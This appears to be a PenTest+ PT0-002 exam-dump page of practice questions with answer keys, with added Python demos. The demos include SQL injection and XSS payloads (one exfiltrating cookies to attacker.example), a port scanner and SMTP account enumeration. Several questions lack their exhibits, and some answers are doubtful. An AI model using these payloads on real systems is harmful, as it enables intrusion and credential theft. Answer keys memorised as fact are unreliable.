Try the real PT0-002 question bank with accurate CompTIA answers, 2024 latest edition [Q159-Q180]



CompTIA PenTest+ PT0-002 exam practice questions

Question # 159
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Familiarity and likeness
  • B. Scarcity and fear
  • C. Social proof and greed
  • D. Authority and urgency

Correct answer: D


Question # 160
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

  • A. Decrypt the authorization header using bcrypt.
  • B. Decode the authorization header using UTF-8.
  • C. Decrypt the authorization header using AES.
  • D. Decode the authorization header using Base64.

Correct answer: D
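
Added example, not part of the original page: the decoding step in Python against a constructed capture. The header carries the scheme `Basic` followed by Base64 of `user:password`, so no key is involved and the credential is merely transcoded, which is why bcrypt or AES "decryption" makes no sense here. The request text, host name and credentials are invented for illustration.

```python
import base64
import binascii

# Constructed sample of a captured request (not from the original page).
CAPTURED_REQUEST = (
    "GET /api/account HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n"
    "User-Agent: curl/8.4.0\r\n"
    "\r\n"
)


def get_header(raw_request, name):
    """Return the value of the first header called `name` (case-insensitive), or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == name.lower():
            return value.strip()
    return None


def decode_basic_auth(header_value):
    """Decode an 'Authorization: Basic <b64>' value into (username, password).

    Base64 is an encoding, not encryption: no key is needed. Raises ValueError
    for a non-Basic scheme, malformed Base64, or a missing ':' separator.
    """
    scheme, sep, token = header_value.partition(" ")
    if not sep or scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header: %r" % scheme)
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("malformed Base64 in Basic credentials") from exc
    # RFC 7617: user-id ":" password; the user-id itself cannot contain ':'.
    user, sep, password = raw.decode("utf-8", errors="replace").partition(":")
    if not sep:
        raise ValueError("decoded credentials lack the ':' separator")
    return user, password


def extract_credentials(raw_request):
    """Return (user, password) from the request, or None if it carries no Authorization header."""
    value = get_header(raw_request, "Authorization")
    if value is None:
        return None
    return decode_basic_auth(value)


if __name__ == "__main__":
    print(extract_credentials(CAPTURED_REQUEST))
```

Because Basic credentials are recoverable by anyone who sees the request, a finding like this is only as serious as the transport: over plain HTTP it is a credential disclosure, over TLS it is mainly a note that the application relies on the channel for secrecy.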


Question # 161
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

  • A. Ping of death
  • B. Smurf
  • C. Fraggle
  • D. Ping flood

Correct answer: C

Explanation:
A Fraggle attack is the same as a Smurf attack except that it sends UDP datagrams (typically to the echo and chargen ports) to the segment's broadcast address instead of ICMP echo requests, so it still works on a segment where ICMP is disabled. Prevention of the two attacks is almost identical: disable directed broadcasts on routers and filter or disable the small UDP services that act as amplifiers.
Ref: https://www.okta.com/identity-101/fraggle-attack/
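
Added example, not from the original page or the referenced Okta article: detection logic that tells the two patterns apart over constructed flow records (the records, the 10.0.5.0/24 segment and the alert threshold are all assumptions). A Fraggle packet is UDP to the segment's directed-broadcast address on an amplifying port such as echo (7) or chargen (19); a Smurf packet is ICMP to the same address. In both cases the source address is the spoofed victim, which is what the detector reports.

```python
import ipaddress
from collections import Counter

# Constructed flow records (not from the original page): "epoch proto src dst dport".
SAMPLE_FLOWS = [
    "1700000001 udp 10.0.5.20 10.0.5.255 7",
    "1700000001 udp 10.0.5.20 10.0.5.255 19",
    "1700000001 udp 10.0.5.20 10.0.5.255 7",
    "1700000002 icmp 10.0.5.20 10.0.5.255 0",
    "1700000002 tcp 10.0.5.31 10.0.5.10 443",
    "1700000003 udp 10.0.5.20 10.0.5.255 7",
    "1700000003 udp 10.0.5.33 10.0.5.10 53",
]

SEGMENT = ipaddress.ip_network("10.0.5.0/24")
# UDP services that answer every datagram and so act as amplifiers in a Fraggle attack.
AMPLIFIER_UDP_PORTS = {7, 19}   # echo, chargen


def parse_flow(line):
    ts, proto, src, dst, dport = line.split()
    return {
        "ts": int(ts),
        "proto": proto.lower(),
        "src": ipaddress.ip_address(src),
        "dst": ipaddress.ip_address(dst),
        "dport": int(dport),
    }


def classify(flow, segment):
    """Return 'smurf', 'fraggle' or None for one flow record.

    Both attacks target the segment's directed-broadcast address with the
    victim's address spoofed as the source; the difference is the transport.
    """
    if flow["dst"] != segment.broadcast_address:
        return None
    if flow["proto"] == "icmp":
        return "smurf"
    if flow["proto"] == "udp" and flow["dport"] in AMPLIFIER_UDP_PORTS:
        return "fraggle"
    return None


def find_amplification_abuse(lines, segment, threshold=3):
    """Count broadcast-amplification packets per (spoofed source, kind).

    The 'source' is the intended victim: every host on the segment replies to
    it. Returns sorted (source, kind, count) tuples at or above `threshold`.
    """
    counts = Counter()
    for line in lines:
        flow = parse_flow(line)
        kind = classify(flow, segment)
        if kind:
            counts[(str(flow["src"]), kind)] += 1
    return sorted((src, kind, n) for (src, kind), n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for src, kind, n in find_amplification_abuse(SAMPLE_FLOWS, SEGMENT):
        print("%s: %d %s packets to %s" % (src, n, kind, SEGMENT.broadcast_address))
```

On the segment in the question the ICMP record would never appear, which is exactly why the UDP rule is the one that matters there; a single Smurf-looking packet stays below the threshold and is not reported.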


Question # 162
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

  • A. Telnet
  • B. HTTP
  • C. SMTP
  • D. SNMP
  • E. NTP
  • F. DNS

Correct answer: B, F


Question # 163
A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

  • A. Shoulder surfing
  • B. Tailgating
  • C. Phishing
  • D. Dumpster diving

Correct answer: D

Explanation:
The penetration tester should try dumpster diving next, which is an attack that involves searching through trash bins or dumpsters for discarded documents or items that may contain sensitive or useful information. Dumpster diving can reveal information such as passwords, account numbers, credit card numbers, invoices, receipts, memos, contracts, or employee records. The penetration tester can use this information to gain access to systems or networks, impersonate users or employees, or perform social engineering attacks. The other options are not likely attacks that the penetration tester should try next based on the discovery that the company does not have a shredding service. Phishing is an attack that involves sending fraudulent emails that appear to be from legitimate sources to trick users into revealing their credentials or clicking on malicious links or attachments. Shoulder surfing is an attack that involves observing or spying on users while they enter their credentials or perform other tasks on their devices. Tailgating is an attack that involves following authorized personnel into a restricted area without proper authorization or identification.


Question # 164
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.




Correct answer:

Explanation:
See explanation below.
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap -sV -p 1-1023 192.168.2.2
3:
#!/usr/bin/python
import socket
import sys

# Ports to check on the target given as the first argument.
ports = [21, 22]

def port_scan(ip, ports):
    # Simple TCP connect check: OPEN if the handshake completes, TIMEOUT if nothing
    # answers, CLOSED on any other socket error (typically a RST).
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        try:
            s.connect((ip, port))
            print("%s:%s - OPEN" % (ip, port))
        except socket.timeout:
            print("%s:%s - TIMEOUT" % (ip, port))
        except socket.error as e:
            print("%s:%s - CLOSED" % (ip, port))
        finally:
            s.close()

port_scan(sys.argv[1], ports)


Question # 165
A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

  • A. Executing a file on the remote system
  • B. Building a scheduled task for execution
  • C. Adding an additional IP address on the compromised system
  • D. Redirecting output from a file to a remote system
  • E. Mapping a share to a remote system
  • F. Creating a new process on all domain systems
  • G. Setting up a reverse shell from a remote system

Correct answer: A, E

Explanation:
WMIC.exe is a built-in Microsoft program that provides command-line access to Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands, locally or on remote hosts.


Question # 166
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Injection flaws
  • B. Race-condition attacks
  • C. Buffer overflows
  • D. Zero-day attacks
  • E. Ransomware attacks
  • F. Cross-site scripting

Correct answer: A, F

Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks in the OWASP Top 10 v2017 list. XSS is an attack that injects malicious scripts into web pages or applications viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are attacks that exploit a vulnerability in how an application builds commands or queries from its input, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.
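
Added example (not from the page or from OWASP): the two listed risks in Python, each in a vulnerable form next to its hardened form. The in-memory SQLite table, the account and both payloads are constructed for illustration.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory user table (not from the original page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """A1 Injection: input is spliced into the SQL text, so a quote in the input
    becomes part of the statement and can rewrite its logic."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return con.execute(query).fetchone()[0] > 0


def login_hardened(con, username, password):
    """Parameterized query: the values travel separately from the SQL text,
    so a quote in the input is compared as data and never parsed as syntax."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone()[0] > 0


def greet_vulnerable(name):
    """A7 XSS: untrusted input written into the HTML body unescaped."""
    return "<p>Hello, %s</p>" % name


def greet_hardened(name):
    """Output encoding for an HTML text node: <, >, &, quotes become entities."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)


# Constructed payloads used to demonstrate each flaw.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable login bypassed:", login_vulnerable(con, "alice", SQLI_PAYLOAD))
    print("hardened login bypassed:  ", login_hardened(con, "alice", SQLI_PAYLOAD))
    print(greet_vulnerable(XSS_PAYLOAD))
    print(greet_hardened(XSS_PAYLOAD))
```

With the SQL payload as the password, the vulnerable statement becomes `... AND password = '' OR '1'='1'`, which is true for every row; the parameterized version simply compares the literal string and fails. The same split applies to XSS: the fix is encoding at the output context, not filtering the input.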


質問 # 167
When
accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:
..d index: eid in /apache/www/validate/user.php line 12
..d index: uid in /apache/www/validate/user.php line 13
..d index: pw in /apache/www/validate/user.php line 14
..d index: acl in /apache/www/validate/user.php line 15

  • A. Incorrect command syntax
  • B. Insufficient error handling
  • C. Insecure data transmission
  • D. Lack of code signing

Correct answer: B

Explanation:
The most probable cause for this output is insufficient error handling, which is a coding flaw that occurs when a program does not handle errors or exceptions properly or gracefully. Insufficient error handling can result in unwanted or unexpected behavior, such as crashes, hangs, or leaks. In this case, the output shows that the program is displaying warning messages that indicate undefined indexes in the user.php file. These messages reveal the names of the variables and the file path that are used by the program, which can expose sensitive information or clues to an attacker. The program should have implemented error handling mechanisms, such as try-catch blocks, error logging, or sanitizing output, to prevent these messages from being displayed or to handle them appropriately. The other options are not plausible causes for this output. Lack of code signing is a security flaw that occurs when a program does not have a digital signature that verifies its authenticity and integrity. Incorrect command syntax is a user error that occurs when a command is entered with wrong or missing parameters or options. Insecure data transmission is a security flaw that occurs when data is sent over a network without encryption or protection.
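
Added example, not the page's code and in Python rather than PHP: the same four fields read two ways, showing what each response leaks. The field names come from the warnings above; the handler shape, status codes and logger are assumptions.

```python
import logging
import traceback

# The four indexes named in the warnings above.
REQUIRED_FIELDS = ("eid", "uid", "pw", "acl")


def validate_user_verbose(form):
    """Reads every field unconditionally and lets the failure text reach the
    client, like the PHP page in the question: the response names the missing
    index, the source file and the line number."""
    try:
        eid, uid, pw, acl = form["eid"], form["uid"], form["pw"], form["acl"]
        return 200, "ok"
    except KeyError as exc:
        # traceback.format_exc() includes 'File "<path>", line N' for this module.
        return 500, "Undefined index: %s\n%s" % (exc.args[0], traceback.format_exc())


def validate_user_hardened(form, log=logging.getLogger("validate")):
    """Checks the input first, keeps the detail in the server log and returns
    a generic message to the client."""
    missing = [k for k in REQUIRED_FIELDS if k not in form]
    if missing:
        log.warning("validate/user: missing fields %s", missing)
        return 400, "Invalid request."
    return 200, "ok"


def leaks_internals(body):
    """Crude check a tester can run on a response body: does it expose a
    server-side path, a line number, or an internal variable name?"""
    return ('File "' in body) or ("line " in body) or any(k in body for k in REQUIRED_FIELDS)


if __name__ == "__main__":
    for handler in (validate_user_verbose, validate_user_hardened):
        status, body = handler({})
        print(handler.__name__, status, "leaks:", leaks_internals(body))
```

The point is the second function's ordering: validate, log server-side, then answer with a message that carries no file paths, variable names or line numbers, which is what the warnings in the question hand to an attacker.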


Question # 168
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As proof in case they are discovered
  • B. As backup in case the original documents are lost
  • C. To guide them through the building entrances
  • D. To validate the billing information with the client

Correct answer: A


Question # 169
A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

  • A. Determine if security tokens are easily available.
  • B. Perform a vulnerability check against the hypervisor.
  • C. Test the strength of the encryption settings.
  • D. Scan the containers for open ports.

Correct answer: D

Explanation:
The first step a tester should perform to determine whether the new containers are configured correctly against a DDoS attack is to scan the containers for open ports. Open ports are entry points for network communication and can expose services or applications that may be vulnerable to DDoS attacks. Scanning the containers for open ports lets the tester identify which services are running on each container, which ones may need to be secured or disabled, and whether any unauthorized or malicious services have been installed by earlier attackers or shipped in compromised images. This can be done with tools such as Nmap, which enumerates hosts and services by sending packets and analyzing the responses. The other options are not the first step. Testing the strength of the encryption settings is not relevant to DDoS, since encryption protects confidentiality and integrity rather than availability. Determining whether security tokens are easily available concerns authentication and authorization, not DDoS. Performing a vulnerability check against the hypervisor is not relevant either: containers share the host's kernel rather than running on a hypervisor, and a hypervisor, where one exists underneath, is not directly exposed to network traffic.


Question # 170
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

  • A. Intrusion detection
  • B. System hardening
  • C. Vulnerability scanning
  • D. Network segmentation

Correct answer: D

Explanation:
Network segmentation is the practice of dividing a network into smaller subnetworks or segments based on different criteria, such as function, security level, or access control. Network segmentation can enhance the security of a network by isolating sensitive or critical systems from less secure or untrusted systems, reducing the attack surface, limiting the spread of malware or intrusions, and enforcing granular policies and rules for each segment. To be PCI compliant, which is a set of standards for protecting payment card data, the company should have implemented network segmentation to separate the servers that perform financial transactions from other parts of the network that may be less secure or more exposed to threats. The other options are not specific requirements for PCI compliance, although they may be good security practices in general.


Question # 171
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

  • A. The penetration tester deletes all scripts from the client machines.
  • B. The client clears system logs generated during the test.
  • C. The client applies patches to the systems.
  • D. The penetration tester conducts a retest.

Correct answer: C


Question # 172
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

  • A. Searching for code repositories associated with the target company's organization
  • B. Searching for code repositories associated with a developer who previously worked for the target company
  • C. Searching for code repositories associated with the target company's competitors
  • D. Searching for code repositories associated with the target company's customers

Correct answer: A

Explanation:
Code repositories are online platforms that store and manage source code and other files related to software development projects. They can contain useful information for additional testing, such as application names, versions, features, functions, vulnerabilities, dependencies, credentials, comments, or documentation. Searching for code repositories associated with the target company's organization would most likely produce useful information for additional testing, as it reveals the software projects the target company is working on or using and may expose weaknesses that can be exploited. Such repositories can be searched on platforms such as GitHub, GitLab, Bitbucket, or SourceForge. The other options are less likely to produce useful information, as they are not directly tied to the target company's software development activities. Repositories associated with a developer who previously worked for the target company may not yield relevant or current information, as the developer may have deleted, moved, or updated them after leaving. Repositories associated with the target company's competitors or customers may not yield useful or accessible information, as they may cover unrelated projects or be restricted from public view.


Question # 173
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

  • A. NDA
  • B. ROE.
  • C. SLA.
  • D. SOW.

Correct answer: B

Explanation:
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The%20ROE%20includes%20the%


Question # 174
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -PA22-25,80
  • B. nmap 192.168.1.1-5 -PS22-25,80
  • C. nmap 192.168.1.1-5 -PU22-25,80
  • D. nmap 192.168.1.1-5 -Ss22-25,80

Correct answer: B

Explanation:
-PS, -PA, -PU and -PY are host-discovery flags that probe with TCP SYN, TCP ACK, UDP and SCTP INIT packets respectively. Since the ports in the options are mostly TCP services, the choice is between -PS and -PA, and since we need to know whether the ports are live, sending a SYN packet is the better alternative. Hence, I choose -PS in this case.


Question # 175
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

  • A. The scanner crashed the system.
  • B. The SSL certificates were invalid.
  • C. The tester IP was blocked.
  • D. The web page was not found.

Correct answer: C


Question # 176
A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

  • A. Pick a lock.
  • B. Impersonate a package delivery worker.
  • C. Disable the cameras remotely.
  • D. Send a phishing email.

Correct answer: B


Question # 177
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Familiarity and likeness
  • B. Scarcity and fear
  • C. Social proof and greed
  • D. Authority and urgency

Correct answer: D


Question # 178
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

  • A. VRFY and TURN
  • B. RCPT TO and VRFY
  • C. EXPN and TURN
  • D. VRFY and EXPN

Correct answer: D

Explanation:
The VRFY and EXPN commands can be used to enumerate user accounts on an SMTP server, as they are used to verify the existence of users or mailing lists. VRFY (verify) asks the server to confirm that a given user name or address is valid. EXPN (expand) asks the server to expand a mailing list into its individual members.
These commands can be used by a penetration tester to identify valid user names or e-mail addresses on the target SMTP server.
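
Added example, not from the original page: the VRFY/EXPN exchange scripted in Python. The target server is a constructed stand-in (mailboxes, list, host names and reply texts are all invented) so the exchange runs offline and can also show the 252/502 replies a hardened server gives; the socket transport has the same interface for a live host and is only to be pointed at systems inside an authorized engagement.

```python
import socket


class FakeSmtpTransport:
    """Constructed stand-in for the target server so the exchange runs offline.
    VRFY/EXPN can be switched off to show the replies a hardened server gives."""

    def __init__(self, mailboxes, lists, vrfy_enabled=True, expn_enabled=True):
        self.mailboxes = mailboxes      # {"alice": "alice@example.test"}
        self.lists = lists              # {"staff": ["alice@example.test", ...]}
        self.vrfy_enabled = vrfy_enabled
        self.expn_enabled = expn_enabled
        self.transcript = ["S: 220 mail.example.test ESMTP"]

    def command(self, line):
        self.transcript.append("C: " + line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            reply = "250 mail.example.test"
        elif verb == "VRFY":
            if not self.vrfy_enabled:
                reply = "252 2.5.2 Cannot VRFY user, but will accept message"
            elif arg in self.mailboxes:
                reply = "250 2.1.5 %s <%s>" % (arg, self.mailboxes[arg])
            else:
                reply = "550 5.1.1 %s... User unknown" % arg
        elif verb == "EXPN":
            if not self.expn_enabled:
                reply = "502 5.5.1 Command not implemented"
            elif arg in self.lists:
                members = self.lists[arg]
                lines = ["250-<%s>" % m for m in members[:-1]] + ["250 <%s>" % members[-1]]
                reply = "\r\n".join(lines)   # multi-line reply; last line carries "250 "
            else:
                reply = "550 5.1.1 %s... List unknown" % arg
        elif verb == "QUIT":
            reply = "221 2.0.0 Bye"
        else:
            reply = "500 5.5.1 Command unrecognized"
        self.transcript.append("S: " + reply)
        return reply


class SocketSmtpTransport:
    """Same interface against a live server; use only within an authorized engagement."""

    def __init__(self, host, port=25, timeout=5):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.reader = self.sock.makefile("rb")
        self.banner = self._read_reply()

    def _read_reply(self):
        lines = []
        while True:   # "250-" marks a continuation line; "250 " ends the reply
            line = self.reader.readline().decode("utf-8", "replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":
                return "\r\n".join(lines)

    def command(self, line):
        self.sock.sendall((line + "\r\n").encode("utf-8"))
        return self._read_reply()


def parse_reply(reply):
    """Split a reply into (code, [text of each line]); the code is on the last line."""
    lines = reply.split("\r\n")
    return int(lines[-1][:3]), [l[4:] for l in lines]


def enumerate_accounts(transport, candidates, list_names):
    """VRFY each candidate user and EXPN each list name. 250 confirms, 550 denies,
    252 or 502 means the verb is disabled and further probing with it is pointless."""
    found = {"users": {}, "lists": {}, "vrfy_blocked": False, "expn_blocked": False}
    transport.command("HELO scanner.example.test")
    for name in candidates:
        code, text = parse_reply(transport.command("VRFY " + name))
        if code == 250:
            found["users"][name] = text[0]
        elif code in (252, 502):
            found["vrfy_blocked"] = True
            break
    for name in list_names:
        code, text = parse_reply(transport.command("EXPN " + name))
        if code == 250:
            found["lists"][name] = text
        elif code in (252, 502):
            found["expn_blocked"] = True
            break
    transport.command("QUIT")
    return found


if __name__ == "__main__":
    server = FakeSmtpTransport({"alice": "alice@example.test", "bob": "bob@example.test"},
                               {"staff": ["alice@example.test", "bob@example.test"]})
    enumerate_accounts(server, ["alice", "carol", "bob"], ["staff", "sales"])
    print("\n".join(server.transcript))
```

Against a live host, replace the fake with `SocketSmtpTransport("mail.example.test")` (a hypothetical name). When both verbs come back 252/502, the remaining option is the slower RCPT TO probing mentioned in the distractors, which most servers also rate-limit, so note the blocked verbs as a positive hardening finding rather than a dead end.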


Question # 179
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted store of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error?

  • A. TCP port 443 is not open on the firewall
  • B. The application has the API certificate pinned.
  • C. The API server is using SSL instead of TLS
  • D. The tester is using an outdated version of the application

Correct answer: B


Question # 180
......

To prepare to pass the PT0-002 exam, try our CompTIA PenTest+ exam package now: https://www.jpntest.com/shiken/PT0-002-mondaishu
